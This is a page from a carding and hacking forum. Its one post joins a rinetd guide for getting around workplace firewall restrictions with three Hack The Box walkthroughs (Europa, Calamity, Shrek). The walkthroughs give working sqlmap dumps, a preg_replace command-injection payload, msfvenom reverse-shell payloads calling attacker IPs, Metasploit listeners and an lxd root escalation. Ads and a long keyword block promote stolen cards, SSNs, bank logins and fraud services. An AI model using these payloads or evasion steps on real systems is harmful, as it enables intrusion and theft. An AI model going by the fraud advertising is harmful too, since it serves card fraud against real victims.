Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc

Announcement :

For Purchasing Advertising Contact Us | Jabber : [email protected] | Telegram :- @bhcis





PLACE YOUR TEXT HERE FOR ADVERTISE
PLACE YOUR TEXT HERE FOR ADVERTISE
CC+CVV Private Base Wholesale & Retail | 200+ Countries | Rare BINs
Best CC Shop Daily Updates | 200+ Countries | High Quality | 24/7 Fast Support
BlackBet.cc Banks, Shops, Real Docs, SSN+DOB, PayPal, GVoice/Gmail, Lookups











>PLACE TEXT ADVERTISING HERE< &PLACE TEXT ADVERTISING HERE< >PLACE TEXT ADVERTISING HERE< >PLACE TEXT ADVERTISING HERE<





Announcement : Black Hat Forum is one of the Best Black Hat Carding Forum welcome you. We will share great stuff for our loved members, hope you enjoy your stay on our Black Hat Forum and you will return to us EVERYDAY. Stay Safe Enjoy Blackhat Carding Forum.


  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5


[Guide] Comprehensive Guide to Port Redirection using Rinetd
#1
0
0
Hello friends! Today we are going to discuss what is Port redirecting/ forwarding? We will also discuss the necessary steps to access the network traffic through firewall restricted port.
Table of Content:
  • What is a port redirecting?
  • Why do we need port redirection?
  • Requirements
  • Implementing firewalls
  • HTTP port redirection
What is Port redirecting?
In computer networking, port forwarding/redirecting or port mapping is an application of network address translation (NAT) that redirects a communication request from one address and port number combination to another while the packets are traversing a network gateway, such as a router or firewall. This technique is most commonly used to make services on a host residing on a protected or masqueraded (internal) network available to hosts on the opposite side of the gateway (external network), by remapping the destination IP address and port number of the communication to an internal host. (From Wikipedia)
Why we need port redirection?
Suppose you are in your workplace where network admin has blocked all 65,535 ports in the network except port 80 and 443 for outgoing traffic. Now you want to access any service which is running on a different port other than 80 and 443 but you are not allowed to send request packet on that port because port 80 and 443 are open ports in your network that can access web server only.
Hence to overcome such a situation we need to apply port redirection techniques.
For example, you are in office and your IP is 192.168.1.102 and firewall has restricted outgoing traffic through all 65535 ports except port 80 and 443 which are allowed to take the request packet outside the network. Now you want to take access of remote system 192.169.1.114 which is running on port 3389 but the firewall will block your request packet on port 3389. With help of proxy server 192.168.1.125, you (192.168.1.1.102) can access RDP server 192.168.1.114 for remote connection as proxy server will forward all incoming traffic to the router and hence you will get access of port 3389.

Now let’s go through detail with its practical
Requirements
  • Windows operating system (Workstation machine) holding IP: 192.168.1.102
  • Windows operating system (Remote server) holding IP: 192.168.1.114
  • Linux operating system (proxy server) holding IP: 192.168.1.125
[Image: 20.png?w=687&ssl=1]
From the given image you can observe that RDP server has the IP Address: 192.168.1.114
[Image: 21.PNG?w=687&ssl=1]
From the given image you can observe that the User system has the IP Address: 192.168.1.102 which will be bounded by firewall restriction policy.
[Image: 23.PNG?w=687&ssl=1]
The network configuration of Proxy server is holding IP Address: 192.168.1.125.
[Image: 24.png?w=687&ssl=1]
Implementing a Firewall on the Users System
Create a new rule in firewall outbound rules for applying the filter on outgoing traffic from your network. Enable Port option for creating a rule that controls connection for a TCP or UDP port.
[Image: 25.PNG?w=687&ssl=1]
Apply rule for all TCP ports from 0-65535 as shown in the image.
[Image: 26.PNG?w=687&ssl=1]
Choose Block option as action should be taken when a connection matches a specified condition.
[Image: 27.PNG?w=687&ssl=1]
Enable all three checkboxes to which action will be implemented.
[Image: 28.PNG?w=687&ssl=1]
Provide the title name to your implemented rule for your awareness.
[Image: 29.PNG?w=687&ssl=1]
Again create another new rule in firewall outbound rules for applying a filter on outgoing traffic from your network. Enable Port option for creating a rule that controls connection for a TCP and does mention port 80,443 this time.
[Image: 30.PNG?w=687&ssl=1]
And this is phase changer step, enable “Allow the connection option” for all network i.e. domain, private and public. Give a suitable title to rule name for your awareness.
Conclusion: Now being a network admin we have applied firewall rule to block outgoing traffic from port 0 to 65,535 but simultaneously allowed port 80 and 443 to take out traffic from our network to any web servers.
[Image: 31.PNG?w=687&ssl=1]
Situation: In a workstation, any employee working in the restricted network requires to connect with the remote system: 192.168.1.14 via port 3389 but get failed due to firewall then how he can access port 3389 without turn off firewall in that network?
[Image: 32.PNG?w=687&ssl=1]
Solution: Port forwarding with proxy server using rinetd — internet
Code:
The contents of this section are hidden for your group

Register or Login
redirection server”.
Rinetd redirects TCP connections from one IP address and port to another. It is a single-process server which handles any number of connections to the address/port pairs specified in the file /etc/rinetd.conf. Since rinetd runs as a single process using non-blocking I/O, it is able to redirect a large number of connections without a severe impact on the machine. This makes it practical to run TCP services on machines inside an IP masquerading firewall.
For more details visit this link:

[To see content please register here]


By means of above theory we need to install Rinetd in a system which is free from firewall restriction, hence it can be any system that is not a client, a machine of your workstation. For example, you can use your home PC/laptop for installing rinetd.
Similarly, I have installed rinetd with help apt repository in my Home PC [192.168.1.125] operates the at Linux platform that will act as a proxy server.
apt-get install rinetd
1
apt-get install rinetd

[Image: 33.png?w=687&ssl=1]
After installing rinetd, open its configuration file from /etc/rinetd.config for configuring it as per your requirement.
[Image: 34.png?w=687&ssl=1]
Here we need to enter following details for port redirection.
  • Bind address: Proxy server IP: 192.168.1.125 (Home PC)
  • Bind port: 80
  • Connect address: RDP server IP: 192.168.1.114
  • Connect port: 3389
[Image: 35.png?w=687&ssl=1]
Then save the file and restart the service with help of below command.
service rinetd restart
1
service rinetd restart

[Image: 36.png?w=687&ssl=1]
To establish a remote connection with RDP server 192.168.1.114 you need to send request packets for remote connection to the Proxy server (192.168.1.125) on port 80 which will forward incoming traffic for the connection request to port 3389 of actual destination machine through the router.
[Image: 37.PNG?w=687&ssl=1]
Enjoy!! The desktop of the RDP server in your firewall congested network.
[Image: 38.PNG?w=687&ssl=1]
HTTP Port Redirection
Example 2nd: In Office, my system is bound under firewall rules as configured above which will block outgoing traffic on every TCP port other than 80 and 443 but I wanted to access a web server which is running on port 8080 for security perspective reasons. Why should I do? The answer is Port redirection with proxy server using rinetd.
Let’s figure out how?
Requirement
  • Linux operating system (Workstation machine) holding IP: 192.168.1.128
  • Ubuntu operating system (web server) holding IP: 192.168.1.110
  • Linux operating system (proxy server) holding IP: 192.168.1.132
[Image: 39.png?w=687&ssl=1]
the network configuration of the user’s workstation system holding IP: 192.168.1.128.
[Image: 40.PNG?w=687&ssl=1]
Implement firewall rule using the IP table for blocking all outgoing TCP packets and allow port 80 and 443 for sending network traffic.
iptables -I OUTPUT -j DROP
iptables -I OUTPUT -p tcp --dport 80 -j ACCEPT
iptables -I OUTPUT -p tcp --dport 443 -j ACCEPT

1
2
3

iptables -I OUTPUT -j DROP
iptables -I OUTPUT -p tcp --dport 80 -j ACCEPT
iptables -I OUTPUT -p tcp --dport 443 -j ACCEPT

[Image: 41.1.PNG?w=687&ssl=1]
The network configuration of proxy server system holding IP: 192.168.1.132.
[Image: 41.png?w=687&ssl=1]
The network configuration of web server holding IP: 192.168.1.110.
[Image: 42.PNG?w=687&ssl=1]
Here for security reason, we are editing listen port from 80 to 8080 and to do so open ports.conf file from inside /etc/apache and make desirable changes.
[Image: 43.PNG?w=687&ssl=1]
As you can see we have transfer web server Apache service on port 8080.
[Image: 44.PNG?w=687&ssl=1]
Then save the file and restart the service with help of below command.
service apache2 restart
1
service apache2 restart

[Image: 45.PNG?w=687&ssl=1]
Now I have installed rinetd with help apt-get command in my Home System(192.168.1.132) operates at Linux platform.
apt-get install rinetd
1
apt-get install rinetd

[Image: 46.png?w=687&ssl=1]
After installing rinetd, open its configuration file from /etc/rinetd.config for configuring it as per your requirement.
[Image: 47.png?w=687&ssl=1]
Here we need to enter following details for port redirection.
  • Bind address: Proxy server IP: 192.168.1.132 (Home PC)
  • Bind port: 80
  • Connect address: RDP server IP: 192.168.1.110
  • Connect port: 8080
[Image: 48.png?w=687&ssl=1]
Then save the file and restart the service with help of below command.
service rinetd restart
1
service rinetd restart

[Image: 49.png?w=687&ssl=1]
Now when you explore your proxy 192.168.1.132 server via port 80 it will redirect incoming traffic to the destination web server 192.168.1.110 on port 8080 and you will access it.
[Image: 50.PNG?w=687&ssl=1]

Hello friends!! Today we are going to solve another CTF challenge “Europa” which is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level. Solving challenges in this lab is not that much tough until you don’t have the correct knowledge of Penetration testing. Let start and learn how to breach a network then exploit it for retrieving desired information.
Level: Hard
Task: find user.txt and root.txt file on the victim’s machine.
Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.22 so let’s begin with nmap port enumeration.
nmap -A 10.10.10.22
1
nmap -A 10.10.10.22

From given below image, you can observe we found port 22, 80 and  443 are open in victim’s network.
[Image: 1.png?w=687&ssl=1]
As you have seen in our all previous lab that we love to explore target IP via port 80 on our web browser, similarly we follow that tradition in this also but Bad Unluckily!! This time it didn’t work at all.
[Image: 2.png?w=687&ssl=1]
Now the last option was to add target IP inside /etc/host file since port 443 was open containing two domain names and as it is a challenge of hack the box thus I edit europacorp.htb and admin-portal.europccorp.htb as a hostname.
[Image: 3.png?w=687&ssl=1]
Then I explore the domain name: admin-portal.europccorp.htb through the web browser and found following login page as shown below.
[Image: 4.png?w=687&ssl=1]
In order to breach confidentiality we can try SQL form based attack and for this, I preferred sqlmap following command to enumerate database name.
sqlmap -u

[To see content please register here]

--form --dbs --batch

1
sqlmap -u

[To see content please register here]

--form --dbs --batch

[Image: 6.png?w=687&ssl=1]
Luckily our assumption set true and it dumbs the database name “admin”.
[Image: 7.png?w=687&ssl=1]
Then I run following command for enumerating entire table details.
sqlmap -u

[To see content please register here]

-D admin --dump-all --batch

1
sqlmap -u

[To see content please register here]

-D admin --dump-all --batch

[Image: 8.png?w=687&ssl=1]
Awesome!! I found a table “users” which 2 entries having the username and password columns.
[Image: 9.png?w=687&ssl=1]
Using online MD5 decryption I cracked hash password and received “SupersecretPassword!” and use these credential to login into admin console.
[Image: 10.png?w=687&ssl=1]
After fruitfully validation I got a dashboard from where I step towards Tools options.
[Image: 11.png?w=687&ssl=1]
It was set up with a script for open VPN generator using the PHP function preg_replace() on user input. When I investigate more related to this function, it is suggested not to use preg_replace() on user input as it can lead to command execution vulnerability.
Considering the above suggestion true, I fetched its request into burp suite and sent it to the repeater for exploit command injection vulnerability.
[Image: 12.png?w=687&ssl=1]
Here I notice three parameter pattern, ipaddress, and test where we can add our arbitrary code for execution but before that, you need to know correct step “how to exploit it” manually.
[Image: 13.png?w=687&ssl=1]
So when I search more related to this then I found so many links which were describing /e option is a threat to PHP preg_replace function.
[Image: 14.png?w=687&ssl=1]
Now the code can be execute by sending http post request as given below format.
pattern=/ip_address/e&ipaddress=arbitrary command&text=ip_addres
For example:  To check directory list we can run following command and verify resultant output.
pattern=/ip_address/e&ipaddress=ls &text=ip_addres
Similarly we can run any malicious code inside this for achieving reversion connection.
[Image: 15.png?w=687&ssl=1]
Using msfvenom following command we had generated malicious bash code for getting a reverse connection from victim’s machine at our listening port.
msfvenom -p cmd/unix/reverse_netcat lhost=10.10.14.6 lport=1234 R
1
msfvenom -p cmd/unix/reverse_netcat lhost=10.10.14.6 lport=1234 R

As shown in the below image, the size of the generated payload is 101 bytes, now copy this malicious code and send it to target. After that start Netcat/multi handler for accessing reverse connection and wait for getting its TTY shell.
[Image: 16.png?w=687&ssl=1]
Now if you will run above-copied code then it will get failed in its mission therefore before running the ordinal code you need to encode it in URL encoding format and then copy the URL encoded code for execution.
[Image: 17.png?w=687&ssl=1]
Now I had pasted the above-encoded code as shown in below image and execute it with the GO tab.
[Image: 18.png?w=687&ssl=1]
Meanwhile, I return to my Metasploit terminal and wait for the meterpreter session by exploiting multi handler.
msf use exploit/multi/handler
msf exploit(multi/handler) set payload cmd/unix/reverse_netcat
msf exploit(multi/handler) set lhost 10.10.14.6
msf exploit(multi/handler) set lport 1234
msf exploit(multi/handler) exploit

1
2
3
4
5

msf use exploit/multi/handler
msf exploit(multi/handler) set payload cmd/unix/reverse_netcat
msf exploit(multi/handler) set lhost 10.10.14.6
msf exploit(multi/handler) set lport 1234
msf exploit(multi/handler) exploit

From given below image you can observe command session1 opened for accessing victim tty shell then I upgrade command shell into a meterpreter session.
[Image: 19.png?w=687&ssl=1]
Pleasing!! We have bound the shell of victims system, now let’s finish the task by grabbing user.txt and root.txt file and after traversing some directory I found the user.txt file in /home/john
Meterpreter>sysinfo
Meterpreter>cd /home
Meterpreter>cd john
Meterpreter>cat user.txt

1
2
3
4

Meterpreter>sysinfo
Meterpreter>cd /home
Meterpreter>cd john
Meterpreter>cat user.txt

Great!!  Here we had completed 1st task now move to 2nd tasK
[Image: 20.png?w=687&ssl=1]
We start penetrating targets machine and after some time we came to know about the clearlogs file which has root privilege from inside contents of crontab file.
Using cat command we read contents of clearlogs here the cronjob was executing the shell script logcleared.sh with root permission.
meterpreter>cat /etc/crontab
meterpreter>cat /var/www/cronjobs/clearlogs

1
2

meterpreter>cat /etc/crontab
meterpreter>cat /var/www/cronjobs/clearlogs

[Image: 21.png?w=687&ssl=1]
Then we move into cmd directory and for spawning proper tty shell of target’s system we need to import python3 file, therefore, I run following command inside the meterpreter shell
[Image: 22.png?w=687&ssl=1]
This time again we had used the same payload cmd/unix/reverse_netcat generated malicious as above on a new port 5678 for reverse connection and copied the generated code and start netcat on a new terminal for getting the reverse connection.
[Image: 23.png?w=687&ssl=1]
Then edit the above malicious code into logcleared.sh file with help of echo command and gave full permission as shown below.
[Image: 24.png?w=687&ssl=1]
nc -lvp 5678
1
nc -lvp 5678

WOW, we got the reverse connection from victims system with root access now let’s catch the flag and finished the task.
id
cd /root
cat flag.txt

1
2
3

id
cd /root
cat flag.txt

Finally, we have completed both tasks successfully and get juice experience.
[Image: 25.png?w=687&ssl=1]

Hello friends!! Today we are going to solve another CTF challenge “Calamity” which is available online for those who want to increase their skill in penetration testing and black box testing. Shrek is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.
Level: Intermediate
Task: find user.txt and root.txt file on victim’s machine.
Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.27 so let’s begin with nmap port enumeration.
nmap -A 10.10.10.27
1
nmap -A 10.10.10.27

From given below image, you can observe we found port 22 and 80 are open in victim’s network.
[Image: 1.png?w=687&ssl=1]
As port 80 is running HTTP on the target machine, so we open the IP address in our browser.
[Image: 2.png?w=687&ssl=1]
We don’t find anything on the homepage so we use dirb to enumerate the directories.
dirb

[To see content please register here]


1
dirb

[To see content please register here]


[Image: 3.png?w=687&ssl=1]
Now we open admin.php, and find a login page. We take a look at the source page but we don’t find anything.
[Image: 5.png?w=687&ssl=1]
When we use curl to access the page we find a password commented in the HTML page.
curl -v

[To see content please register here]


1
curl -v

[To see content please register here]


[Image: 6.png?w=687&ssl=1]
We try the username admin and the password we find on the page to login to the page. We then get access to a page that allows us to run php code in it.
[Image: 7.png?w=687&ssl=1]
We first try to execute normal PHP payload but are unable to get a stable tty shell, so we use base64 encoded php shell to exploit this web application. We generate a base64 encoded shell using metasploit.
msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.3 lport=4444 -e php/base64 -f raw
1
msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.3 lport=4444 -e php/base64 -f raw

[Image: 8.png?w=687&ssl=1]
We paste this shell in the target machine’s page between <?php ?> tag.
[Image: 9.png?w=687&ssl=1]
We setup our listener using metasploit to get reverse shell. As soon as we run our shell on the page we get the reverse shell.
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 10.10.14.3
msf exploit(multi/handler) > set lport 4444
msf exploit(multi/handler) > exploit

1
2
3
4
5

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 10.10.14.3
msf exploit(multi/handler) > set lport 4444
msf exploit(multi/handler) > exploit

[Image: 10.png?w=687&ssl=1]
After getting reverse shell we enumerate through the directories, in /home/xalvas we find a file called user.txt. When we open user.txt we find our first flag.
[Image: 11.png?w=687&ssl=1]
We also find a file called recov.wav; we download it to our system to gain further information.
download recov.wav /root/Desktop
1
download recov.wav /root/Desktop

We go to alarmclocks directory inside the xalvas directory and find 1 mp3 and 1 wav file. We download both files into our system.
download rick.wav /root/Desktop/
download xouzouris.mp3 /root/Desktop/

1
2

download rick.wav /root/Desktop/
download xouzouris.mp3 /root/Desktop/

[Image: 12.png?w=687&ssl=1]
We use a tool called audacity to perform steganography on the audio files. Listening to the audio we find 2 of them sound similar. We load recov.wav and rick.wav into audacity, invert rick.wav then export the combination of both. After combining both the files we find a password in the audio “18547936..*
[Image: 13.png?w=687&ssl=1]
We use the username as xalvas and password that we found in the audio file to log in through ssh into the target machine. When we run id command we find that the user is added in lxd group.
[Image: 15.png?w=687&ssl=1]
As lxd is a container technology we can run processes as root using lxd. To exploit this we download “lxd alpine builder” to create an image of alpine Linux.
git clone

[To see content please register here]


1
git clone

[To see content please register here]


[Image: 17.png?w=687&ssl=1]
Now create a 32-bit Alpine Linux image using lxd alpine builder.
[Image: 18.png?w=687&ssl=1]
We send the Linux image to the target machine using scp.
scp alpine-v3.7-i686-20180405_0501.tar.gz [email protected]:
1
scp alpine-v3.7-i686-20180405_0501.tar.gz [email protected]:

[Image: 19.png?w=687&ssl=1]
We go to the target machine and import the Linux image and create an image called ignite with administrative privileges.
mkdir raj
mv  alpine-v3.7-i686-20180405_0501.tar.gz raj
lxc image import alpine-v3.7-i686-20180405_0501.tar.gz --alias alpine
lxc image list
lxc init alpine ignite -c security.privileged=true

1
2
3
4
5

mkdir raj
mv  alpine-v3.7-i686-20180405_0501.tar.gz raj
lxc image import alpine-v3.7-i686-20180405_0501.tar.gz --alias alpine
lxc image list
lxc init alpine ignite -c security.privileged=true

[Image: 20.png?w=687&ssl=1]
We mount the whole filesystem into the container; we start the container and execute the shell the shell inside. After spawning the shell we open root.txt in /mnt/root/root directory and find the final flag.
lxc config device add ignite mydevice mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh

1
2
3

lxc config device add ignite mydevice mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh

[Image: 21.png?w=687&ssl=1]

Hello friends!! Today we are going to solve another CTF challenge “Shrek” which is available online for those who want to increase their skill in penetration testing and black box testing. Shrek is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.
Level: Intermediate
Task: find user.txt and root.txt file on victim’s machine.
Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.47 so let’s begin with nmap port enumeration.
nmap -sV 10.10.10.47
1
nmap -sV 10.10.10.47

From given below image, you can observe we found port 21,22 and 80 are open in victim’s network.
[Image: 1.png?w=687&ssl=1]
As we know from the nmap scan that the target machine is running HTTP on port 80, we open the Ip in our browser.
[Image: 3.png?w=687&ssl=1]
We don’t find anything on the home page, so we use dirb to enumerate the directories.
dirb

[To see content please register here]


1
dirb

[To see content please register here]


[Image: 2.png?w=687&ssl=1]
dirb scan shows a directory called uploads. We open uploads/ directory and find a file called secret_ultimate.php.
[Image: 4.png?w=687&ssl=1]
Now we use wget to download the file into our system.
wget

[To see content please register here]


1
wget

[To see content please register here]


[Image: 5.png?w=687&ssl=1]
We open secret_ultimate.php and find a path to a directory called secret_area_51.
[Image: 6.png?w=687&ssl=1]
We open it in our browser and find an audio file in that directory.
[Image: 7.png?w=687&ssl=1]
We download into our system and use an online site called academo.org to analyse the spectrum, we find a hint to log in through FTP using username donkey.
[Image: 8.png?w=687&ssl=1]
Further analysis of the audio file gives us the password to the username.
[Image: 9.png?w=687&ssl=1]
We login through FTP using the credentials we find in the audio file. After logging in we find a few text files and a file simply called key.
[Image: 10.png?w=687&ssl=1]
We download the key and all the test files we use mget to mass-download the txt files.
ftp> get key
ftp> mget *.txt

1
2

ftp> get key
ftp> mget *.txt

[Image: 11.png?w=687&ssl=1]
On our system as we can see all the files have been downloaded.
[Image: 12.png?w=687&ssl=1]
We open the files one by one and in the highlighted file above we found a base64 encoded string that was differentiated by space.
[Image: 13.png?w=687&ssl=1]
We decode the first base64 encoded string using hack bar and find the decoded string to be ‘PrinceCharming’
[Image: 14.png?w=687&ssl=1]
In another file, we find a base64 encoded string similarly differentiated by space.
[Image: 15.png?w=687&ssl=1]
We decode the base64 encoded string and find a hexadecimal encoded string.
[Image: 16.png?w=687&ssl=1]
We use python to decode the hexadecimal string. We use seccure module and use ‘PrinceCharming’ as key to decode the string and find the ssh username and passphrase for the key
import seccure
string ="hexadecimal string"
print seccure.decrypt(string, "PrinceCharming")

1
2
3

import seccure
string ="hexadecimal string"
print seccure.decrypt(string, "PrinceCharming")

[Image: 17.png?w=687&ssl=1]
We open the key file and find that is a rsa key for ssh.
[Image: 18.png?w=687&ssl=1]
We use this key to log in through using this rsa key. We use the username as sec as we found earlier and use the passphrase we found before to log in. As we log in we go to /home/sec directory, in that directory we find a file called user.txt. When we open the file we get our first flag.
[Image: 19.png?w=687&ssl=1]
Going through the directories we find a file called thoughts.txt
[Image: 20.png?w=687&ssl=1]
We create a file called raj in this directory.
[Image: 21.png?w=687&ssl=1]

After a few minutes, we find that it changed to user and group of the file changed to root.
[Image: 22.png?w=687&ssl=1]
Now to exploit the file we create a c program in our system that can give us the root.txt file in root directory. After creating the file we use SimpleHTTPServer module of python to transfer the file.
[Image: 23.png?w=687&ssl=1]
We now download the file into the target system using wget.
wget

[To see content please register here]


1
wget

[To see content please register here]


After downloading the file we compile the c program and save the compiled executable as rootshell.
gcc shell.c -o rootshell
1
gcc shell.c -o rootshell

[Image: 24.png?w=687&ssl=1]
We now wait for the system to change the user and group of the file. As soon as it changes the user and group of the file we run it and find the final flag.
[Image: 25.png?w=687&ssl=1]
Reply







Users browsing this thread:
1 Guest(s)

 


Blackhat Carding forum



Search keywords: the best carding forum, credit card dumps, free credit cards, carding forum, carders forum, wu transfer, western union transfer, hacked ccv, cc dumps, legit carders, altenen hackers, hacking tutorials, free porn acconts, paypal dumps, bank account login, alboraaq hackers, cheap apple items carded, market hackers, fraud market, perfectmoney stealer, platinum card, database dump, atn, how to card btc, free paypal logs, altenen, how to card bitcoins, bitcoin carding, btc carding, amex cc, havij carding tutorial, shop credit card, visa cc, cheap shipping, alboraaq, underground forum, botnet, hacking programs, bitshacking, truehackers, cc stealer, how to get credit cards, dumps, pin, logs, email logs, hacking tools, hacking programs,carding tools, ccv checker, ccv balance checker, carding tutorials, mg transfer, wu transf, bank transfer, card clone, WebMoney carding, card clone, the best hacking country, india hackers team, alboraaq , pakistan hackers, wu transfer to nigeria, wu bug, wu transfer, iPhone carding shipping, hacking and carding forum, carding stuff, porn accounts, x'xx passwords, WebMoney hacking, abh cc live, fresh smtp, hacking forum scam free smtp, wmz carding , spam paypal, caring, true carders, carding board, what is the best hacking forum, www.hackingforum.ru, www.carderscave.ru, www.darkgeo.com, www.darkgeo.su, www.darkgeo.ru, the best hacking forum, freedom to palestine, indian hackers team, spaming tools, ams fresh spaming, inbox spaming, fresh leads, proxy list, bitcoin wallet stealer, how to hack a bitcoin wallet, perfect money adder, hacking forum rip, carding board, western union transfer only for real hackers, carding 2020, carders 2020, carders forum 2020, carding forum 2020, hacking forum 2020, fraud market 2020, carding tutorials 2020, carding forum 2020, carders forum 2020, carding tutorials 2020, carders 2020, hackers forum 2020, hacking forum 2020, fraud market 2020, hacked wu 2020, carded iphone 2020, cardingf.com. Carding forum, Carders Forum, Hacking Forum, Hackers Forum, Cheap WU Transfer, CCV Dumps, Legit Carders 2020, ATN Team, Altenen, Hacking Tutorials, Free Premium Porn Accounts, Carding Tools 2020, Fraud Carding, Fraudsters Marketplace, Carding Forum Scam, Inbox Spamming, Free Mailer PHP, Free VPN 2020, Best VPN 2020, AlphaBay Market, Free Fresh Mail Leads, Real Hacker Forum, Alboraaq Review, Alboraaq Hackers, Perfect Money Stealer, Darknet Forums, Darknet Hackers, Darknet Carders, Cardable Websites 2020, Buy Credit Card Dumps, Western Union Generator, Money Gram Transfers Cheap, Free CVV, Free RDP, Cheap RDP, Amazon Carding 2020, NonVBV Cardable Websites, TOR VPN 2020, Russian Carding Forum, UK Carding Forums, Bitcoin Wallet Stealer, Bitcoin Carding, Bank Stealer, Hacked Bank Logins, Bank Logins, Free Keyloggers 2020, Best Keylogger Download, Free Receipt Generator, Card Bitcoins easy, Amazon method, Best Pakistan Carders, Dumps Section, Legit Carding, Unseen, Tutamail, Deepdotweb, CC Live, Free premium logs, iPhone 6s Carded, Cheap Electronics Carding, Black Marketplace, Cheap Bank Transfers, Carding Tools, Havij Hacking, India Hackers, Cheap Apple Carding 2020, PayPal Dumps Logs, Market Hackers, Fresh email logs, btc carding, amex cc, havij carding tutorial, shop credit card, visa cc, cheap shipping, alboraaq, underground forum, botnet, hacking programs, bitshacking, truehackers, cc stealer, how to get credit cards, dumps, pin, logs, email logs, hacking tools, hacking programs, carding tools, ccv checker, ccv balance checker, carding tutorials, mg transfer, wu transf, bank transfer, card clone, hacking stuff, card clone, the best hacking country, india hackers team, alboraaq scamming, pakistan hackers, wu transfer to nigeria, wu bug, wu transfer, iPhone carding shipping, hacking and carding forum, carding stuff, porn accounts, xxx passwords, xxx username and passwords, abh cc live, fresh smtp, hacking forum scam free smtp, ams spamming, spam paypal, caring, true carders, carding board, what is the best hacking forum, the best hacking forum, freedom to palestine, indian hackers team, spaming tools, ams fresh spaming, inbox spaming, the best carding forum, credit card dumps, free credit cards, carding forum, carders forum, wu transfer, western union transfer, hacked ccv, cc dumps, legit carders, altenen hackers, hacking tutorials, free porn acconts, paypal dumps, bank account login, alboraaq hackers, cheap apple items carded, market hackers, fraud market, perfectmoney stealer, platinum card, database dump, atn, how to card btc, free paypal logs, altenen, how to card bitcoins, bitcoin carding, fresh leads, proxy list, bitcoin wallet stealer, how to hack a bitcoin wallet, perfect money adder, hacking forum rip, carding board, western union transfer, carding 2020, carders 2020, carders forum 2020, carding forum 2020, hacking forum 2020, fraud market 2020, carding tutorials 2020, carding forum 2020, carders forum 2020, carding tutorials 2020, carders 2020, hackers forum 2020, hacking forum 2020, fraud market 2020, hacked wu 2020, carded iphone 2020, cardingf.com, altenen, altenen.com, alboraaq, alboraaq.com